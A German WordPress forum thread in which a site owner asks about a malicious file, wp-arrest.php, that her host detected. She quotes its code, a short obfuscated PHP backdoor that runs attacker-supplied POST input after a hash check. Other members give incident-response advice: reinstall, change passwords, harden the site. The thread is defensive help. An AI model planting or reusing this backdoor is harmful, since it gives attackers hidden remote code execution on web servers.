Angriff auf Ihren 1&1 Webspace

  • Hallo,

    hoffe, ich habe das richtige Forum für meine Frage gewählt.

    Ich erhielt von 1&1 folgende Nachricht:
    [FONT=arial]Vor wenigen Minuten meldete unser Anti-Viren-Scanner, dass eine schädliche Datei auf Ihren 1&1 Webspace geladen wurde. Der Name der Datei ist:[/FONT]
    [FONT=arial]~/performance/wp-includes/wp-[/FONT][FONT=arial]arrest.php

    Über Google konnte ich zu der Datei keine Infos finden. Kann mir jemand weiterhelfen?

    Viele Grüße
    Jeanette[/FONT]

    • Anzeige

    Hallo!

    Wenn du gerade an deiner Website arbeitest oder dein aktuelles Hosting überdenkst: Wir betreiben mit NetzLiving eine Hosting-Plattform, die speziell auf Performance, Sicherheit und einfache Verwaltung ausgelegt ist.

    • ✔️ Schnelle Ladezeiten (optimiert für WordPress & Co.)
    • ✔️ Deutsche Server & DSGVO-konform
    • ✔️ Persönlicher Support (kein 0815-Ticket-System)

    Mehr erfahren

  • Lade die Datei runter, öffne sie mit einem Texteditor und poste mal die ersten 20-30 Zeilen hier (je nach dem wie lang die Datei ist).

  • Prinzpiell brauchst du dir die Datei auch nicht anschauen, denn wenn du sie nicht hoch geladen hast, gibt es eine Lücke auf dem Server, mit der Angreifer spielen können. Also suchen und absichern.

  • Zunächst meinen Dank an alle für die prompte Antwort und Hilfsbereitschaft. Ich konnte erkältungsbedingt nicht früher reagieren.

    Ich öffnete wp-arrest.php über den FTP-Zugang mittels eines Text-Editors und sehe folgenden Code:

    PHP
    <?php
        extract($_POST, 1);
        strripos(@sha1($shall), "1c1775a7") == 32 && @$not(stripslashes($pass));


    Soll ich die Datei so lassen, ändern oder ersetzen?

    Viele Grüße
    Jeanette

    Einmal editiert, zuletzt von Monika (6. Oktober 2015 um 21:28)

  • wp-arrest.php gehört nicht zum Lieferumfang von WordPress. Bitte vergleiche die Verzeichnisinhalte mit dem Standard-WordPress-Download (oben rechts auf dieser Webseite). Du kannst davon ausgehen, dass weitere Dateien kompromittiert sind. Prüfe Deine Plugins und frag zusätzlich Google - dort findest Du weitere Tipps, denen Du nachgehen kannst.

    Die Installation muss auf jeden Fall bereinigt oder sogar neu aufgesetzt werden (eine Datenbanküberprüfung ist hier auch angesagt). Erst danach solltest Du die Passwörter ändern (alle!).

  • Danke Herr Schmidt und Brawler.

    Ich konnte einen Backup Restore durchführen, darüber in Wordpress Admin gelangen. wp-arrest.php ist nicht mehr im Verzeichnis. Ich aktualisierte die Wordpress-Version erneut, und aktualisierte Theme und Plugins. Ob damit alle Infizierungen weg sind, weiß ich nicht abschließend. Gemeldet wurde seither keine Infizierung. Die Website kann wieder problemlos im Browser aufgerufen werden.

    Vielleicht könnt ihr mir noch weiter helfen:

    Brawler:
    Der Hoster prüft auf Viren, wenn Dateien auf dem Webspace geändert oder neu hochgeladen werden. Wie sinnvoll / ratsam ist es, zusätzlich einen eigenen Virenscan über den Webspace laufen zu lassen? Falls sinnvoll: habt ihr einen Tip? Idealerweise eine kostenfreie oder günstige Lösung. Meinst du das mit Installation bereinigen?


    Herr Schmidt: wie kann ich herausfinden, über welche Lücke die Datei online gestellt wurde?

    Viele Grüße
    Jeanette

  • Hast du nur das Backup wieder eingespielt oder auch sämtliche Passwörter geändert (z. B. FTP und Datenbank) und alle User neu angelegt mit neuen Passwörtern?

    Das Geheimnis des Könnens liegt im Wollen!
    [size=12]Bitte keine Hilfegesuche per PN (auch keine "privaten" Links). Das ist ein öffentliches Forum.[/SIZE]

  • Der Hoster prüft auf Viren, wenn Dateien auf dem Webspace geändert oder neu hochgeladen werden. Wie sinnvoll / ratsam ist es, zusätzlich einen eigenen Virenscan über den Webspace laufen zu lassen? Falls sinnvoll: habt ihr einen Tip? Idealerweise eine kostenfreie oder günstige Lösung. Meinst du das mit Installation bereinigen?

    Massenhoster prüfen nicht nur auf Viren, sondern permanent was die Kunden mit ihrem Webspace so anstellen. Dabei werden insbesondere Skripte (PHP, JavaScript und was es sonst noch so gibt) auf bestimmte Dinge untersucht und im Alarmzustand direkt die "Schotten dicht gemacht".

    So lange Du keinen eigenen Server hast, kannst Du auch keinen eigenen "Virenscanner" nutzen. Du kannst Tools wie bspw. https://sitecheck.sucuri.net/ nutzen - diese schauen aber nur auf die Oberfläche und nicht in das Grundgerüst. Davon abgesehen sichert man sich im Vorfeld ab - wenn ein Tool alarm schlägt, ist es zu spät. ;)

    Für Sicherheit musst Du selber sorgen.

    http://codex.wordpress.org/Hardening_WordPress und https://wpvulndb.com/ sind erste Anlaufstellen.

Jetzt mitmachen!

Sie haben noch kein Benutzerkonto auf unserer Seite? Registrieren Sie sich kostenlos und nehmen Sie an unserer Community teil!